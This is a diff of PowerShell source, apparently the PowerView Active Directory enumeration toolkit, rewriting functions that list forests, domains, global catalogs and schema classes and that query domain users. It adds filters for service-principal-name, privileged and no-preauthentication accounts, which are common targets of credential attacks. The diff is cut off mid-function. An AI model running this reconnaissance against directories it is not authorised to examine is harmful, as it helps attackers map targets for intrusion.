+        else {
+            # otherwise use the current forest
+            $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
         }
-        catch {
-            Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust."
-            return $Null
+
+        if ($ForestObject) {
+            # get the SID of the forest root
+            if ($PSBoundParameters['Credential']) {
+                $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name -Credential $Credential).objectsid
+            }
+            else {
+                $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name).objectsid
+            }
+
+            $Parts = $ForestSid -Split '-'
+            $ForestSid = $Parts[0..$($Parts.length-2)] -join '-'
+            $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid
+            $ForestObject
         }
     }
-    else {
-        # otherwise use the current forest
-        $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
-    }
+}
+
+
+function Get-ForestDomain {
+<#
+.SYNOPSIS
+
+Return all domains for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Forest  
+
+.DESCRIPTION
+
+Returns all domains for the current forest or the forest specified
+by -Forest X.
+
+.PARAMETER Forest
+
+Specifies the forest name to query for domains.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target forest.
+
+.EXAMPLE
+
+Get-ForestDomain
 
-    if($ForestObject) {
-        # get the SID of the forest root
-        $ForestSid = (New-Object System.Security.Principal.NTAccount($ForestObject.RootDomain,"krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
-        $Parts = $ForestSid -Split "-"
-        $ForestSid = $Parts[0..$($Parts.length-2)] -join "-"
-        $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid
-        $ForestObject
+.EXAMPLE
+
+Get-ForestDomain -Forest external.local
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestDomain -Credential $Cred
+
+.OUTPUTS
+
+System.DirectoryServices.ActiveDirectory.Domain
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('System.DirectoryServices.ActiveDirectory.Domain')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True)]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Forest,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    PROCESS {
+        $Arguments = @{}
+        if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
+        if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
+
+        $ForestObject = Get-Forest @Arguments
+        if ($ForestObject) {
+            $ForestObject.Domains
+        }
     }
 }
 
 
-filter Get-NetForestDomain {
+function Get-ForestGlobalCatalog {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Return all global catalogs for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Forest  
+
+.DESCRIPTION
 
-        Return all domains for a given forest.
+Returns all global catalogs for the current forest or the forest specified
+by -Forest X by using Get-Forest to retrieve the specified forest object
+and the .FindAllGlobalCatalogs() to enumerate the global catalogs.
 
-    .PARAMETER Forest
+.PARAMETER Forest
 
-        The forest name to query domain for.
+Specifies the forest name to query for global catalogs.
 
-    .PARAMETER Credential
+.PARAMETER Credential
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetForestDomain
+Get-ForestGlobalCatalog
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetForestDomain -Forest external.local
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestGlobalCatalog -Credential $Cred
+
+.OUTPUTS
+
+System.DirectoryServices.ActiveDirectory.GlobalCatalog
 #>
 
-    param(
-        [Parameter(ValueFromPipeline=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('System.DirectoryServices.ActiveDirectory.GlobalCatalog')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True)]
+        [ValidateNotNullOrEmpty()]
         [String]
         $Forest,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential
+    PROCESS {
+        $Arguments = @{}
+        if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
+        if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
 
-    if($ForestObject) {
-        $ForestObject.Domains
+        $ForestObject = Get-Forest @Arguments
+
+        if ($ForestObject) {
+            $ForestObject.FindAllGlobalCatalogs()
+        }
     }
 }
 
 
-filter Get-NetForestCatalog {
+function Get-ForestSchemaClass {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Helper that returns the Active Directory schema classes for the current
+(or specified) forest or returns just the schema class specified by
+-ClassName X.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Forest  
+
+.DESCRIPTION
+
+Uses Get-Forest to retrieve the current (or specified) forest. By default,
+the .FindAllClasses() method is executed, returning a collection of
+[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] results.
+If "-FindClass X" is specified, the [DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass]
+result for the specified class name is returned.
+
+.PARAMETER ClassName
+
+Specifies a ActiveDirectorySchemaClass name in the found schema to return.
+
+.PARAMETER Forest
+
+The forest to query for the schema, defaults to the current forest.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-ForestSchemaClass
+
+Returns all domain schema classes for the current forest.
 
-        Return all global catalogs for a given forest.
+.EXAMPLE
 
-    .PARAMETER Forest
+Get-ForestSchemaClass -Forest dev.testlab.local
 
-        The forest name to query domain for.
+Returns all domain schema classes for the external.local forest.
 
-    .PARAMETER Credential
+.EXAMPLE
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Get-ForestSchemaClass -ClassName user -Forest external.local
 
-    .EXAMPLE
+Returns the user schema class for the external.local domain.
 
-        PS C:\> Get-NetForestCatalog
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestSchemaClass -ClassName user -Forest external.local -Credential $Cred
+
+Returns the user schema class for the external.local domain using
+the specified alternate credentials.
+
+.OUTPUTS
+
+[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass]
+
+An ActiveDirectorySchemaClass returned from the found schema.
 #>
-    
-    param(
-        [Parameter(ValueFromPipeline=$True)]
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([System.DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass])]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True)]
+        [Alias('Class')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ClassName,
+
+        [Alias('Name')]
+        [ValidateNotNullOrEmpty()]
         [String]
         $Forest,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential
+    PROCESS {
+        $Arguments = @{}
+        if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }
+        if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }
 
-    if($ForestObject) {
-        $ForestObject.FindAllGlobalCatalogs()
+        $ForestObject = Get-Forest @Arguments
+
+        if ($ForestObject) {
+            if ($PSBoundParameters['ClassName']) {
+                ForEach ($TargetClass in $ClassName) {
+                    $ForestObject.Schema.FindClass($TargetClass)
+                }
+            }
+            else {
+                $ForestObject.Schema.FindAllClasses()
+            }
+        }
     }
 }
 
 
-filter Get-NetDomainController {
+function Find-DomainObjectPropertyOutlier {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Finds user/group/computer objects in AD that have 'outlier' properties set.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass  
+
+.DESCRIPTION
+
+Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass.
+If a -ReferenceObject is passed, the class is extracted from the passed object.
+A 'reference' set of property names is then calculated, either from a standard set preserved
+for user/group/computers, or from the array of names passed to -ReferencePropertySet, or
+from the property names of the passed -ReferenceObject. These property names are substracted
+from the master schema propertyu name list to retrieve a set of 'non-standard' properties.
+Every user/group/computer object (depending on determined class) are enumerated, and for each
+object, if the object has a 'non-standard' property set, the object samAccountName, property
+name, and property value are output to the pipeline.
+
+.PARAMETER ClassName
+
+Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.
+If -ReferenceObject is specified, this will be automatically extracted, if possible.
+
+.PARAMETER ReferencePropertySet
+
+Specifies an array of property names to diff against the class schema.
+
+.PARAMETER ReferenceObject
+
+Specicifes the PowerView user/group/computer object to extract property names
+from to use as the reference set.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
 
-        Return the current domain controllers for the active domain.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER Domain
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        The domain to query for domain controllers, defaults to the current domain.
+.PARAMETER Tombstone
 
-    .PARAMETER DomainController
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Credential
 
-    .PARAMETER LDAP
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        Switch. Use LDAP queries to determine the domain controllers.
+.EXAMPLE
 
-    .PARAMETER Credential
+Find-DomainObjectPropertyOutlier -User
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Enumerates users in the current domain with 'outlier' properties filled in.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetDomainController -Domain 'test.local'
-        
-        Determine the domain controllers for 'test.local'.
+Find-DomainObjectPropertyOutlier -Group -Domain external.local
 
-    .EXAMPLE
+Enumerates groups in the external.local forest/domain with 'outlier' properties filled in.
 
-        PS C:\> Get-NetDomainController -Domain 'test.local' -LDAP
+.EXAMPLE
 
-        Determine the domain controllers for 'test.local' using LDAP queries.
+Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
 
-    .EXAMPLE
+Enumerates computers in the current domain with 'outlier' properties filled in.
 
-        PS C:\> 'test.local' | Get-NetDomainController
+.OUTPUTS
 
-        Determine the domain controllers for 'test.local'.
+PowerView.PropertyOutlier
+
+Custom PSObject with translated object property outliers.
 #>
 
-    [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.PropertyOutlier')]
+    [CmdletBinding(DefaultParameterSetName = 'ClassName')]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ClassName')]
+        [Alias('Class')]
+        [ValidateSet('User', 'Group', 'Computer')]
+        [String]
+        $ClassName,
+
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ReferencePropertySet,
+
+        [Parameter(ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ReferenceObject')]
+        [PSCustomObject]
+        $ReferenceObject,
+
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $DomainController,
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
 
         [Switch]
-        $LDAP,
+        $Tombstone,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    if($LDAP -or $DomainController) {
-        # filter string to return all domain controllers
-        Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)'
+    BEGIN {
+        $UserReferencePropertySet = @('admincount','accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','description', 'displayname','distinguishedname','dscorepropagationdata','givenname','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','lockouttime','logoncount','memberof','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','primarygroupid','pwdlastset','samaccountname','samaccounttype','sn','useraccountcontrol','userprincipalname','usnchanged','usncreated','whenchanged','whencreated')
+
+        $GroupReferencePropertySet = @('admincount','cn','description','distinguishedname','dscorepropagationdata','grouptype','instancetype','iscriticalsystemobject','member','memberof','name','objectcategory','objectclass','objectguid','objectsid','samaccountname','samaccounttype','systemflags','usnchanged','usncreated','whenchanged','whencreated')
+
+        $ComputerReferencePropertySet = @('accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','distinguishedname','dnshostname','dscorepropagationdata','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','localpolicyflags','logoncount','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','operatingsystem','operatingsystemservicepack','operatingsystemversion','primarygroupid','pwdlastset','samaccountname','samaccounttype','serviceprincipalname','useraccountcontrol','usnchanged','usncreated','whenchanged','whencreated')
+
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+        # Domain / Credential
+        if ($PSBoundParameters['Domain']) {
+            if ($PSBoundParameters['Credential']) {
+                $TargetForest = Get-Domain -Domain $Domain | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name
+            }
+            else {
+                $TargetForest = Get-Domain -Domain $Domain -Credential $Credential | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name
+            }
+            Write-Verbose "[Find-DomainObjectPropertyOutlier] Enumerated forest '$TargetForest' for target domain '$Domain'"
+        }
+
+        $SchemaArguments = @{}
+        if ($PSBoundParameters['Credential']) { $SchemaArguments['Credential'] = $Credential }
+        if ($TargetForest) {
+            $SchemaArguments['Forest'] = $TargetForest
+        }
     }
-    else {
-        $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential
-        if($FoundDomain) {
-            $Founddomain.DomainControllers
+
+    PROCESS {
+
+        if ($PSBoundParameters['ReferencePropertySet']) {
+            Write-Verbose "[Find-DomainObjectPropertyOutlier] Using specified -ReferencePropertySet"
+            $ReferenceObjectProperties = $ReferencePropertySet
+        }
+        elseif ($PSBoundParameters['ReferenceObject']) {
+            Write-Verbose "[Find-DomainObjectPropertyOutlier] Extracting property names from -ReferenceObject to use as the reference property set"
+            $ReferenceObjectProperties = Get-Member -InputObject $ReferenceObject -MemberType NoteProperty | Select-Object -Expand Name
+            $ReferenceObjectClass = $ReferenceObject.objectclass | Select-Object -Last 1
+            Write-Verbose "[Find-DomainObjectPropertyOutlier] Caldulated ReferenceObjectClass : $ReferenceObjectClass"
+        }
+        else {
+            Write-Verbose "[Find-DomainObjectPropertyOutlier] Using the default reference property set for the object class '$ClassName'"
+        }
+
+        if (($ClassName -eq 'User') -or ($ReferenceObjectClass -eq 'User')) {
+            $Objects = Get-DomainUser @SearcherArguments
+            $SchemaClass = Get-ForestSchemaClass @SchemaArguments -ClassName 'User'
+            $ReferenceObjectProperties = $UserReferencePropertySet
+        }
+        elseif (($ClassName -eq 'Group') -or ($ReferenceObjectClass -eq 'Group')) {
+            $Objects = Get-DomainGroup @SearcherArguments
+            $SchemaClass = Get-ForestSchemaClass @SchemaArguments -ClassName 'Group'
+            $ReferenceObjectProperties = $GroupReferencePropertySet
+        }
+        elseif (($ClassName -eq 'Computer') -or ($ReferenceObjectClass -eq 'Computer')) {
+            Write-Verbose "COMPUTER!"
+            $Objects = Get-DomainComputer @SearcherArguments
+            $SchemaClass = Get-ForestSchemaClass @SchemaArguments -ClassName 'Computer'
+            $ReferenceObjectProperties = $ComputerReferencePropertySet
+        }
+        else {
+            throw "[Find-DomainObjectPropertyOutlier] Invalid class: $ClassName"
+        }
+
+        $SchemaProperties = $SchemaClass | Select-Object -ExpandProperty OptionalProperties | Select-Object -ExpandProperty name
+        $SchemaProperties += $SchemaClass | Select-Object -ExpandProperty MandatoryProperties | Select-Object -ExpandProperty name
+
+        # find the schema properties that are NOT in the first returned reference property set
+        $NonstandardProperties = Compare-Object -ReferenceObject $ReferenceObjectProperties -DifferenceObject $SchemaProperties -PassThru
+
+        ForEach ($Object in $Objects) {
+            $ObjectProperties = Get-Member -InputObject $Object -MemberType NoteProperty | Select-Object -Expand Name
+            ForEach($ObjectProperty in $ObjectProperties) {
+                if ($NonstandardProperties -Contains $ObjectProperty) {
+                    $Out = New-Object PSObject
+                    $Out | Add-Member Noteproperty 'SamAccountName' $Object.SamAccountName
+                    $Out | Add-Member Noteproperty 'Property' $ObjectProperty
+                    $Out | Add-Member Noteproperty 'Value' $Object.$ObjectProperty
+                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.PropertyOutlier')
+                    $Out
+                }
+            }
         }
     }
 }
@@ -2472,86 +4427,189 @@ filter Get-NetDomainController {
 #
 ########################################################
 
-function Get-NetUser {
+function Get-DomainUser {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Query information for a given user or users in the domain
-        using ADSI and LDAP. Another -Domain can be specified to
-        query for users across a trust.
-        Replacement for "net users /domain"
+Return all users or specific user objects in AD.
 
-    .PARAMETER UserName
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty  
 
-        Username filter string, wildcards accepted.
+.DESCRIPTION
 
-    .PARAMETER Domain
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all user objects for
+the current domain are returned.
 
-        The domain to query for users, defaults to the current domain.
+.PARAMETER Identity
 
-    .PARAMETER DomainController
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted. Also accepts DOMAIN\user format.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER SPN
 
-    .PARAMETER ADSpath
+Switch. Only return user objects with non-null service principal names.
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER AdminCount
 
-    .PARAMETER Filter
+Switch. Return users with '(adminCount=1)' (meaning are/were privileged).
 
-        A customized ldap filter string to use, e.g. "(description=*admin*)"
+.PARAMETER AllowDelegation
 
-    .PARAMETER AdminCount
+Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'
 
-        Switch. Return users with adminCount=1.
+.PARAMETER DisallowDelegation
 
-    .PARAMETER SPN
+Switch. Return user accounts that are marked as 'sensitive and not allowed for delegation'
 
-        Switch. Only return user objects with non-null service principal names.
+.PARAMETER TrustedToAuth
 
-    .PARAMETER Unconstrained
+Switch. Return computer objects that are trusted to authenticate for other principals.
 
-        Switch. Return users that have unconstrained delegation.
+.PARAMETER PreauthNotRequired
 
-    .PARAMETER AllowDelegation
+Switch. Return user accounts with "Do not require Kerberos preauthentication" set.
 
-        Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'
+.PARAMETER Domain
 
-    .PARAMETER PageSize
+Specifies the domain to use for the query, defaults to the current domain.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER LDAPFilter
 
-    .PARAMETER Credential
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.PARAMETER Properties
 
-    .EXAMPLE
+Specifies the properties of the output object to retrieve from the server.
 
-        PS C:\> Get-NetUser -Domain testing
+.PARAMETER SearchBase
 
-    .EXAMPLE
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        PS C:\> Get-NetUser -ADSpath "LDAP://OU=secret,DC=testlab,DC=local"
-#>
+.PARAMETER Server
 
-    param(
-        [Parameter(Position=0, ValueFromPipeline=$True)]
-        [String]
-        $UserName,
+Specifies an Active Directory server (domain controller) to bind to.
 
-        [String]
-        $Domain,
+.PARAMETER SearchScope
 
-        [String]
-        $DomainController,
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        [String]
-        $ADSpath,
+.PARAMETER ResultPageSize
 
-        [String]
-        $Filter,
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER FindOne
+
+Only return one result object.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.PARAMETER Raw
+
+Switch. Return raw results instead of translating the fields into a custom PSObject.
+
+.EXAMPLE
+
+Get-DomainUser -Domain testlab.local
+
+Return all users for the testlab.local domain
+
+.EXAMPLE
+
+Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator"
+
+Return the user with the given SID, as well as Administrator.
+
+.EXAMPLE
+
+'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
+
+lastlogoff                                   samaccountname
+----------                                   --------------
+12/31/1600 4:00:00 PM                        dfm.a
+12/31/1600 4:00:00 PM                        dfm
+12/31/1600 4:00:00 PM                        harmj0y
+12/31/1600 4:00:00 PM                        Administrator
+
+.EXAMPLE
+
+Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation
+
+Search the specified OU for privileged user (AdminCount = 1) that allow delegation
+
+.EXAMPLE
+
+Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+
+Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUser -Credential $Cred
+
+.EXAMPLE
+
+Get-Domain | Select-Object -Expand name
+testlab.local
+
+Get-DomainUser dev\user1 -Verbose -Properties distinguishedname
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))
+
+distinguishedname
+-----------------
+CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
+
+.INPUTS
+
+String
+
+.OUTPUTS
+
+PowerView.User
+
+Custom PSObject with translated user property fields.
+
+PowerView.User.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+#>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.User')]
+    [OutputType('PowerView.User.Raw')]
+    [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+        [String[]]
+        $Identity,
 
         [Switch]
         $SPN,
@@ -2559,2450 +4617,3638 @@ function Get-NetUser {
         [Switch]
         $AdminCount,
 
+        [Parameter(ParameterSetName = 'AllowDelegation')]
         [Switch]
-        $Unconstrained,
+        $AllowDelegation,
 
+        [Parameter(ParameterSetName = 'DisallowDelegation')]
         [Switch]
-        $AllowDelegation,
+        $DisallowDelegation,
 
-        [ValidateRange(1,10000)] 
+        [Switch]
+        $TrustedToAuth,
+
+        [Alias('KerberosPreauthNotRequired', 'NoPreauth')]
+        [Switch]
+        $PreauthNotRequired,
+
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Domain,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
+
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ServerTimeLimit,
+
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
+
+        [Switch]
+        $Tombstone,
+
+        [Alias('ReturnOne')]
+        [Switch]
+        $FindOne,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
+
+        [Switch]
+        $Raw
     )
 
-    begin {
-        # so this isn't repeated if users are passed on the pipeline
-        $UserSearcher = Get-DomainSearcher -Domain $Domain -ADSpath $ADSpath -DomainController $DomainController -PageSize $PageSize -Credential $Credential
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $UserSearcher = Get-DomainSearcher @SearcherArguments
     }
 
-    process {
-        if($UserSearcher) {
+    PROCESS {
+        if ($UserSearcher) {
+            $IdentityFilter = ''
+            $Filter = ''
